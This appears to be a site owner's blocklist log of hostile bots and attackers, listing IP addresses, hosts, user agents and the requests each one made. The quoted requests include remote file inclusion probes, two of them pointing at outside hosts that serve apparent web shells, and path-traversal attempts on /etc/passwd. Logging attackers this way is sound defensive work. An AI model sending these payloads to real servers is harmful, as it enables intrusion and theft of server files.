Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/vito.php?rf
50.2.225.11 Host: United States – Phoenix Serverhub
Web server: 1 website – healthyplannow.com
Spam bot
User agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/27.0.1453.116 Safari/537.36
217.160.6.66 Hostname: dialog21.de
Host: Germany – Karlsruhe 1&1 Internet Ag
Web server: 74 websites
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) //images/stories/petx.gif
89.40.71.2 Hostname: shared1.indicii.ro
Host: Romania – Vaslui Clues On It Srl
Web server: 119 websites
Hacker bot – Looking for osCommerce/Zencart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Known hacker botnet user agent:
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
176.43.199.131 Hostname: host-176-43-199-130.reverse.superonline.net
Host: Turkey – Istanbul Tellcom Fiber Dynamic
Hacker bot – Dictionary attack on WordPress admin
173.243.120.37 Hostname: rdns.yourcpanelserver.com
Host: United States – Lenoir Ajay Kumar
Hacker bot scanning for Open Flash Chart exploits
//components/com_jnews/includes/openflashchart/tmp-upload-images/guys.php?rf
Malicious user agent: libwww-perl/5.805
68.43.96.242 Hostname: c-68-43-96-242.hsd1.mi.comcast.net
Host: United States – Taylor Comcast Cable Communications Inc.
Banned bot: Gigabot
User agent: Gigabot/3.0 (http: //www.gigablast.com/spider.html)
71.72.18.97 Hostname: cpe-71-72-18-97.neo.res.rr.com
Host: United States – Cleveland Time Warner Cable Internet Llc
SEOENGWorldBot
User agent: SEOENGWorldBot/1.0 (+http: //www.seoengine.com/seoengbot.htm)
81.92.221.101 Hostname: x-200-75.fasturl.net
Host: Portugal – Leiria Nfsi Telecom Lda.
Web server: 159 websites
Hacker bot scanning for shell RFI exploits
1) /includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=http: //www.google.com/humans.txt?
2) /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http: //www.google.com/humans.txt?
3) /nukebrowser.php?filnavn=http://www.google.com/humans.txt?filhead=http: //www.google.com/humans.txt?&cmd=id
4) /[path]/mybic_server.php?file=http: //www.google.com/humans.txt?
6) /modules/Forums/admin/admin_styles.php?phpbb_root_path=http: //www.google.com/humans.txt?
7) /sendstudio/admin/includes/createemails.inc.php?ROOTDIR=http: //www.google.com/humans.txt?
8) /inhalt.php?dateien[news]=http: //www.google.com/humans.txt?
9) /PHPDJ_v05/dj/djpage.php?page=http: //www.google.com/humans.txt?
10) /NuclearBB/tasks/send_queued_emails.php?root_path=http: //www.google.com/humans.txt?
Many others
188.240.48.2 Host: Romania – Bucharest Appnor Msp Sa
Web server: 1 website – gdgs.ro
Hacker bot scanning for shell RFI exploits
1) /includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=http: //www.google.com/humans.txt?
2) /index.php?url=http: //www.google.com/humans.txt?
3) /nukebrowser.php?filnavn=http: //www.google.com/humans.txt?filhead=http: //www.google.com/humans.txt?&cmd=id
4) /index.php?mosConfig_absolute_path=http: //www.google.com/humans.txt?
5) /modules/My_eGallery/public/displayCategory.php?basepath=http: //www.google.com/humans.txt?
6) /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http: //www.google.com/humans.txt?
7) /adm/krgourl.php?DOCUMENT_ROOT=http: //www.google.com/humans.txt?
8) /visitor.php?_SERVER[DOCUMENT_ROOT]=http: //www.google.com/humans.txt??
9) /account.php?insPath=http: //www.google.com/humans.txt?
10) /run.php?dir=SHELL?&file=http: //www.google.com/humans.txt?
Many others
204.73.200.75 Hostname: x-200-75.fasturl.net
Host: United States – New York City Fasturl Inc.
Web server: 79 websites
Hacker bot looking for PHP exploits
1) /pma/scripts/setup.php
2) /myadmin/scripts/setup.php
3) /phpMyAdmin/scripts/setup.php
75.127.110.27 Hostname: web.server.MX.relay.75.127.110.27-static.reverse.yourdnshost.com
Host: United States – Atlanta Global Net Access Llc
Web server: 181 websites
Hacker bot scanning for shell RFI exploits
1) /includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=http: //www.google.com/humans.txt?
2) /index.php?url=http: //www.google.com/humans.txt?
3) /nukebrowser.php?filnavn=http: //www.google.com/humans.txt?filhead=http: //www.google.com/humans.txt?&cmd=id
4) /index.php?mosConfig_absolute_path=http: //www.google.com/humans.txt?
5) /modules/My_eGallery/public/displayCategory.php?basepath=http: //www.google.com/humans.txt?
6) /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http: //www.google.com/humans.txt?
7) /adm/krgourl.php?DOCUMENT_ROOT=http: //www.google.com/humans.txt?
8) /visitor.php?_SERVER[DOCUMENT_ROOT]=http ://www.google.com/humans.txt??
9) /account.php?insPath=http: //www.google.com/humans.txt?
10) /run.php?dir=SHELL?&file=http: //www.google.com/humans.txt?
Many others
54.221.186.8 Hostname: ec2-54-221-186-8.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Proximic.com commercial spy bot “brand protection services”
User agent: Mozilla/5.0 (compatible; proximic; +http: //www.proximic.com/info/spider.php)
31.169.80.180 Hostname: win1.ilkeiletisim.com
Host: Turkey – Istanbul Netfactor Telekominikasyon Ve Teknoloji Hizmetleri Sanayi Ve Jsc
Web server: 70 websites
Hacker bot – looking for admin exploits
/wp-login.php
/administrator/index.php
/admin.php
194.109.22.88 Host: Netherlands – Amsterdam Xs4all Servers
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
46.109.176.169 Host: Latvia – Riga Address Pool For Ltc-home Customers
Scanning for index.php
5.135.143.42 Hostname: ns2340621.ovh.net
Host: France – Roubaix Ovh Systems
Web server: 102 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
94.123.146.165 Host: Turkey – Ankara Dogan Tv Digital Platform Isletmeciligi A.s
Hacker bot – Dictionary attack on WordPress admin
5.9.2.166 Hostname: mail.russianb2b.com
Host: Germany – Nuremberg Hetzner Online Ag
Web server: 58 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
189.13.74.84 Hostname: 189-13-74-84.user.veloxzone.com.br
Host: Brazil – Rio De Janeiro Telemar Norte Leste S.a.
Hacker looking for phpmyadmin exploits
176.31.7.194 Host: France – Roubaix Ovh Systems
Spammer
Banned host
64.207.187.243 Hostname: lqby-x2jg.accessdomain.com
Host: United States – Culver City Media Temple Inc.
Web server: 56 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/vito.php?rf
99.53.98.27 Hostname: 99-53-98-27.lightspeed.cyprtx.sbcglobal.net
Host: United States – Cypress AT&T Internet Services
Web server: 6 websites
Hacker bot – Looking for wpOnlineStore/osCommerce/Zencart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Known hacker botnet user agent:
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
37.59.144.179 Host: France – Roubaix Ovh Systems
Spammer
Banned host: Roubaix Ovh Systems
98.131.1.231 Host: United States – Columbus Ecommerce Corporation
Web server: 8 websites
Hacker bot – Looking for wpOnlineStore/osCommerce/Zencart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Fake Googlebot user agent
106.120.173.74 Hostname: 74.173.120.106.static.bjtelecom.net
Host: China – Beijing Chinanet Beijing Province Network
Banned bot: Sogou spider
User agents:
New-Sogou-Spider/1.0 (compatible; MSIE 5.5; Windows 98)
Sogou web spider/4.0(+http: //www.sogou.com/docs/help/webmasters.htm#07)
151.237.177.157 Host: Sweden – Stockholm Deepak Mehta Fie
Web server: 3 websites – cheapmkonsale.com , raybanoutletzone.net , tomsshoescenter.net
Spam bot
50.63.184.242 Hostname: ip-50-63-184-242.ip.secureserver.net
Host: United States – Scottsdale Godaddy.com Llc
Web server: 3 websites – enetcentral2.com , enetrecruiter.com , enetrecruiters.com
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /images/stories/food.php?rf
83.54.46.209 Hostname: 209.Red-83-54-46.dynamicIP.rima-tde.net
Host: Spain – Madrid Telefonica De Espana Sau
Banned bot: Xenu Link Sleuth/1.3.8
217.195.202.53 Hostname: static-217-195-202-53.fibersunucu.com.tr
Host: Turkey – Istanbul Fibersunucu Internet Hizmetleri Ugur Pala
Spammer
139.195.65.184 Host: Indonesia – Jakarta Pt. First Media Tbk
Spammer
37.59.141.215 Host: France – Roubaix Ovh Systems
Spammer
Banned host
173.214.171.146 Host: United States – Secaucus Interserver Inc
Web server: 40 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/config.inc.php?rf
83.235.249.42 Hostname: webmail.etean.com.gr
Host: Greece – Athens
Banned scraper bot: WWW-Mechanize/1.72
50.23.194.66 Hostname: server1.dattaserver.com
Host: United States – Dallas Softlayer Technologies Inc.
Web server: 1 website – dattaserver.com
Hacker botnet – Dictionary attack on WordPress admin
50.22.12.14 Hostname: 50.22.12.14-static.reverse.softlayer.com
Host: United States – Dallas Softlayer Technologies Inc.
Web server: 520 websites
Hacker botnet – Dictionary attack on WordPress admin
41.78.28.120 Host: South Africa – Grahamstown Alexandre Miller Cc T/a Imaginet
Web server: 1751 websites
Hacker botnet – Dictionary attack on WordPress admin
41.204.202.46 Hostname: www46.cpt2.host-h.net
Host: South Africa – Johannesburg Hetzner (pty) Ltd
Web server: 252 websites
Hacker botnet – Dictionary attack on WordPress admin
41.203.18.61 Hostname: www61.jnb2.host-h.net
Host: South Africa – Johannesburg Hetzner (pty) Ltd
Web server: 227 websites
Hacker botnet – Dictionary attack on WordPress admin
41.203.16.98 Host: South Africa – Johannesburg Hetzner (pty) Ltd
Web server: 492 websites
Hacker botnet – Dictionary attack on WordPress admin
216.120.249.201 Hostname: host119.hrwebservices.net
Host: United States – Clifton Park Hostrocket Web Services
Web server: 1 website – brainfutures.com
Hacker botnet – Dictionary attack on WordPress admin
199.168.189.126 Hostname: server.bludomain5.net
Host: United States – Orlando Hostdime.com Inc.
Web server: 262 websites
Hacker botnet – Dictionary attack on WordPress admin
193.33.187.66 Host: United Kingdom – Kent Racksrv Communications Limited
Web server: 518 websites
Hacker botnet – Dictionary attack on WordPress admin
190.210.204.137 Host: Argentina – Buenos Aires Nss S.a.
Web server: 752 websites
Hacker botnet – Dictionary attack on WordPress admin
103.9.64.110 Hostname: lamp1.cloudsites.net.au
Host: Australia – Victoria Park The Trustee For For The Collins Family Trust
Web server: 165 websites
Hacker botnet – Dictionary attack on WordPress admin
103.9.100.211 Hostname: icefish.vodien.com
Host: Singapore – Vodien Internet Solutions Pte Ltd
Web server: 586 websites
Hacker botnet – Dictionary attack on WordPress admin
190.120.233.47 Host: Panama – Infolink Panama Corp
Web server: 14 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) //images/stories/explore.gif
71.62.109.144 Hostname: c-71-62-109-144.hsd1.va.comcast.net
Host: United States – Richmond Comcast Cable Communications Holdings Inc
Banned bot: WWW-Mechanize/1.73
213.169.68.38 Hostname: agrocond.naverex.kiev.ua
Host: Ukraine – Kiev Navigator Online Tov
Hacker bot looking for admin exploits
190.96.85.95 Hostname: traact.cl
Host: Chile – Santiago Manquehuenet
Web server: 17 websites
Hacker bot – Looking for wpOnlineStore/osCommerce/Zencart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Malicious bot user agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2)
Gecko/20100115 Firefox/3.6
59.120.113.230 Hostname: 59-120-113-230.HINET-IP.hinet.net
Host: Taiwan – Kaohsiung Data Communication Business Group
Hacker bot – Looking for wpOnlineStore/osCommerce/Zencart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Malicious bot user agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2)
Gecko/20100115 Firefox/3.6
199.204.248.107 Hostname: s107.n248.n204.n199.static.myhostcenter.com
Host: United States – Columbus Jumpline Inc
Web server: 1106 websites
Hacker bot looking for admin exploits
23.19.46.53 Hostname: c-23-19-46-53.hsd1.az.comcast.net
Host: United States – Phoenix Nobis Technology Group Phoenix
Banned spammer user agent:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)
Trying to register with non-existent link – direct access attempt, no other page loaded
Banned host: Nobis Technology Group
177.22.119.110 Hostname: POC.MINAS.netsi.com.br
Host: Brazil – Pouso Alegre Tobias Freitas De Souza
Hacker – Dictionary attack on WordPress admin
46.255.160.252 Hostname: 46-255-160-252.phpnet.fr
Host: France – Grenoble Phpnet France Premium
Web server: 1 website – galix-chausseur.com
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/3xp.php
83.222.126.42 Host: United States – Reston Digitalone Ag Colocation And Dedicated Servers
Web server: 9 websites
Malicious user agents:
1) python-requests/2.0.0 CPython/2.7.3 Linux/3.2.0-23-generic
2) Python-urllib/2.7
197.221.61.85 Hostname: rslr01.webtelhosting.co.za
Host: South Africa – Johannesburg Hetzner (pty) Ltd
Web server: 59 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Malicious user agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2)
Gecko/20100115 Firefox/3.6
64.131.77.252 Host: United States – Reston Servint
Web server: 10 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
198.27.82.155
198.27.66.38
Hostname: crawl-198-27-82-155.meanpathbot.com
Host: Canada – Montreal Ovh Hosting Inc.
Meanpathbot. Claims to index website source code; HTML, CSS and JavaScript
Why would anyone want their CSS and JS indexed?
User agent: Mozilla/5.0 (compatible; meanpathbot/1.0; +http://www.meanpath.com/meanpathbot.html)
208.77.221.210 Host: Australia – Chatswood Reed Business Information Pty Ltd
Business information bot – CatchBot
CatchBot/5.0; +http: //www.catchbot.com
Rule breaker – does not get robots.txt
77.75.73.17 Hostname: fulltextrobot-77-75-73-17.seznam.cz
Host: Czech Republic – Prague Seznam.cz A.s.
Banned bot
User agent: SeznamBot/3.0 (+http://fulltext.sblog.cz/)
37.59.28.91 Hostname: ns3327715.ovh.net
Host: France – Roubaix Ovh Systems
Web server: 15 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
Heavy attack hits sites about every second
195.22.101.5 Hostname: server84.icehosting.nl
Host: Netherlands – Enschede Interracks C.v.
Web server: 261 websites
Spammer – looking for non-existent xmlrpc.php
176.28.8.81 Hostname: hecustomer01.ctseuro.com
Host: Germany – Koeln Hosteurope Gmbh
Web server: 19 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/vito.php?rf
199.58.163.139 Hostname: apollo.medialayer.net
Host: United States – Ashburn Medialayer Llc
Web server: 153 websites
Hacker – looking for RFI exploits
/?_SERVER[DOCUMENT_ROOT]=http://www.google.com/humans.txt?
/?_CONFIG[files][functions_page]=http://www.google.com/humans.txt?
/[path]/mybic_server.php?file=http://www.google.com/humans.txt?
/impex/ImpExData.php?systempath=http://www.google.com/humans.txt?
/index.php?module=PostWrap&page=http://www.google.com/humans.txt?
97.74.127.145 Hostname: ip-97-74-127-145.ip.secureserver.net
Host: United States – Scottsdale Godaddy.com Llc
Web server: 1 website – r3f3r.com
Hacker – Dictionary attack on WordPress admin
207.58.129.164 Hostname: vps.bornis.net
Host: United States – Reston Servint
Web server: 20 websites
Hacker – Dictionary attack on WordPress admin
108.166.84.135 Hostname: 108-166-84-135.static.cloud-ips.com
Host: United States – San Antonio Slicehost
Web server: 23 websites
Hacker – Dictionary attack on WordPress admin
69.64.61.73 Hostname: dewa.rumahbagus.com
Host: United States – Saint Louis Hosting Solutions International Inc.
Web server: 484 websites
Hacker – Dictionary attack on WordPress admin
72.29.78.36 Hostname: manu30.manufrog.com
Host: United States – Orlando Hostdime.com Inc.
Web server: 291 websites
Hacker – Dictionary attack on WordPress admin
37.122.210.63 Hostname: vps85249797.123-vps.co.uk
Host: United Kingdom – Derby Webfusion Internet Solutions
Web server: 3 websites
Hacker – Dictionary attack on WordPress admin
70.38.54.242 Hostname: ns1.vizualtech.com
Host: Canada – Montreal Iweb Dedicated Cl
Web server: 21 websites
Hacker – Dictionary attack on WordPress admin
199.101.50.131 Hostname: www .lapsonmexico.com
Host: United States – Clifton Park Dotblock.com
Web server: 4 websites
Hacker – Dictionary attack on WordPress admin
109.235.58.169 Hostname: 109-235-58-169.ifo.net
Host: Austria – Vautron Rechenzentrum Ag
Web server: 70 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
54.197.143.42 Hostname: ec2-54-197-143-42.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Cliqzbot
Another trash bot hosted on Amazon Web Services
94.177.98.230 Hostname: alarmadi.pl
Host: Poland – Zebrzydowice Fhu Alarmadi
Web server: 42 websites
Hacker – attack on WordPress admin
94.177.98.230 Host: Romania – Baia Mare Globe Hosting Ltd
Web server: 1 website – inpascani.ro
Hacker – attack on WordPress admin
94.120.199.89 Host: Turkey – Istanbul Dogan Tv Digital Platform Isletmeciligi A.s
Hacker – dictionary attack on WordPress with user-name admin
70.40.219.163 Hostname: 70-40-219-163.unifiedlayer.com
Host: United States – Temecula Unified Layer
Web server: 4 websites
Some sort of bot without a user agent ID
Looked for admin vulnerabilities incl:
/administrator/index.php
/wp-login.php
50.62.41.168 Hostname: ip-50-62-41-168.ip.secureserver.net
Host: United States – Scottsdale Godaddy.com Llc
Web server: 1 website – ibnsoftware.com
Hacker: Dictionary attack on WordPress login with user name admin
50.62.42.245 Hostname: ip-50-62-42-245.ip.secureserver.net
Host: United States – Scottsdale Godaddy.com Llc
Web server: 10 websites
Hacker: Dictionary attack on WordPress login with user name admin
103.10.116.239 Host: India – Shiliguri Siliguri Internet & Cable Tv Pvt. Ltd.
Hacker / spammer looking for admin exploits:
/administrator/index.php
/wp-login.php
/admin.php
112.207.37.195 Hostname: 112.207.37.195.pldt.net
Host: Philippines – Sampaloc Pldt Clac10ki01 Dhcp
Hacker / spammer looking for admin exploits:
/administrator/index.php
/wp-login.php
/admin.php
204.12.247.162 Host: United States – Kansas City Zhou Pizhong
Banned bot: MJ12bot
User agent: Mozilla/5.0 (compatible; MJ12bot/v1.4.4; http: //www.majestic12.co.uk/bot.php?+)
217.170.200.123 Hostname: server1.studiofx.no
Host: Norway – Oslo Servetheworld As
Web server: 3 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
88.198.43.215 Host: Germany – Nuremberg Hetzner Online Ag
Web server: 4 websites
Banned bots: WWW-Mechanize/1.73
120.28.125.66 Host: Philippines – Marikina Gbb San Juan
Banned bot: Xenu Link Sleuth/1.3.8
176.28.48.168 Hostname: rs206095.rs.hosteurope.de
Host: Germany – Koeln Host Europe Gmbh
Web server: 189 websites
Hacker looking for various Open Flash Chart exploits
Examples:
//administrator/components/com_maian15/charts/tmp-upload-images/vito.php?rf
//admin_area/charts/tmp-upload-images/vito.php?rf
/articles/wp-content/plugins/seo-watcher/ofc/tmp-upload-images/vito.php?rf
User agents:
libwww-perl/5.834
Microsoft Internet Explorer/4.0b1 (Windows 95)
91.250.84.75 Hostname: rs204598.rs.hosteurope.de
Host: Germany – Koeln Host Europe Gmbh
Web server: 31 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
83.169.35.187 Host: Germany – Koeln Host Europe Gmbh
Web server: 76 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
80.66.63.90 Hostname: admin.vipweb.at
Host: Austria – Vienna Linznet Internet Service Provider Gmbh
Web server: 808 websites
Spammer
Multiple failed hits on xmlrpc.php
194.150.113.81 Hostname: nixweb01.dandomain.dk
Host: Denmark – Randers Dandomain
Web server: 655 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
193.136.230.22 Hostname: paloma.isr.uc.pt
Host: Portugal – Coimbra Fundacao Para A Ciencia E A Tecnologia I.p.
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agent:
1) BOT/0.1 (BOT for JCE)
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
50.2.225.160 Host: United States – Henderson Serverhub Cloud Ovz Dallas
Spammer
Multiple attempts to register user account and post content
/node/add
/?q=user/register
37.59.43.124 Hostname: ns399284.ip-37-59-43.eu
Host: France – Roubaix Ovh Systems
Web server: 33 websites
Hacker: Remote File Inclusion attempt / WordPress GD Star Ratings plugin RFI exploit:
//wp-content/gd-star-rating/?src=http%3A%2F%2Fwordpress.com.timsagida.com.tr%2Fshellx.php
Known hacker botnet user agent:
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28
82.165.137.20 Hostname: s16505052.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet Ag
Web server: 112 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/borong.gif
70.38.27.172 Host: Canada – Montreal Lise Watier Cosmetiques Inc.
Hacker: Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/xmlrpc.php%22%20/%3E%20%3C!–%5Bif%20lt%20IE%209%5D%3E%3Cscript%20src=%22DOMAIN/wp-content/themes/d5-business-line/framework/timthumb.php?src=http://wordpress.com.pinoypc.net/dlc.php
Multiple fake user agents:
Mozilla/5.0 (compatible;bingbot/2.0;+http: //www.bing.com/bingbot.htm)
Gigabot/3.0 (http: //www.gigablast.com/spider.html)
Mozilla/5.0 (compatible; Googlebot/2.1; +http: //www.google.com/bot.html)
Mozilla/5.0 (compatible;Baiduspider/2.0;+http: //www.baidu.com/search/spider.html)
FreeWebMonitoring SiteChecker/0.1 (+http: //www.freewebmonitoring.com)
Sogou web spider/4.0(+http: //www.sogou.com/docs/help/webmasters.htm#07)
173.78.205.252 Hostname: pool-173-78-205-252.tampfl.fios.verizon.net
Host: United States – Tampa Verizon Online Llc
Spammer.
Fake user agent: Mozilla/5.0 (compatible; Googlebot/2.1; http: //www.google.com/bot.html)
Spambot user agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 99; BBOT 1.0)
79.142.67.54 Hostname: hosted-by.altushost.com
Host: Netherlands – Amsterdam Altushost B.v.
Web server: 22 websites
Brute force admin attack
/dnet_admin/index.php?edit_id=2&_p=2&type=../../../../../../../../etc/passwd%00
/includes/masthead.inc.php?template_path=../../../../../../../../../../etc/passwd%00
/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd%00
More
66.187.74.100 Host: United Kingdom – London Privax Ltd
(The Optimal Link Corporation)
Xenu Link Sleuth/1.3.8
82.145.46.102 Host: United Kingdom – Maidenhead Iomart Hosting Limited
aiHitBot
Business information scraper
Mozilla/5.0 (compatible; aiHitBot/2.8; +http://endb-consolidated.aihit.com/)
122.201.82.82 Hostname: host.emotionserver1.com.au
Host: Australia – Sydney Net Logistics Pty. Ltd.
Web server: 126 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/vito.php?rf
146.48.81.119 Hostname: silabsrv.isti.cnr.it
Host: Italy – Pisa Consiglio Nazionale Delle Ricerche
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/config.inc.php?rf
80.39.185.196 Hostname: 196.Red-80-39-185.dynamicIP.rima-tde.net
Host: Spain – Madrid Telefonica De Espana Sau
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
95.130.14.144 Hostname: vm004.webigniter.eu
Host: France – Paris Digicube Sas
Web server: 1 website – mitambo2.com
Mitambo Crawler bot
“SEO” spy bot
Does not get robots.txt
User agent: Mozilla/* AppleWebKit/* Chrome/* Safari/* (Mitambo crawler http: //www.mitambo.com/info-webmasters)
62.98.186.72 Hostname: ppp-72-186.98-62.inwind.it
Host: Italy – Roma Wind Telecomunicazioni Spa
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
95.110.225.22 Hostname: host22-225-110-95.serverdedicati.aruba.it
Host: Italy – Arezzo Aruba S.p.a.
Web server: 26 websites
Unidentified bot looking for non-existent URLs
176.61.139.154 Hostname: ns1.vidaemcristo.com.br
Host: Sweden – Braas Deepak Mehta Fie
Comment spammer
/comment/function(
184.171.254.93 Hostname: ns1.vidaemcristo.com.br
Host: United States – Orlando Hostdime.com Inc.
Web server: 3 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
107.6.95.9
107.6.95.10
107.6.95.11
107.6.95.18
107.6.95.13
107.6.95.14
107.6.95.15
107.6.95.16
107.6.95.18
107.6.95.19
107.6.95.20
107.6.95.21
107.6.95.22
107.6.95.42
107.6.95.122
Hostname: secure.onavo.com
Host: United States – Lewisville Voxel Dot Net Inc.
ICAP-IOD Bot
Ignores robots.txt
Crawling for images – no other content
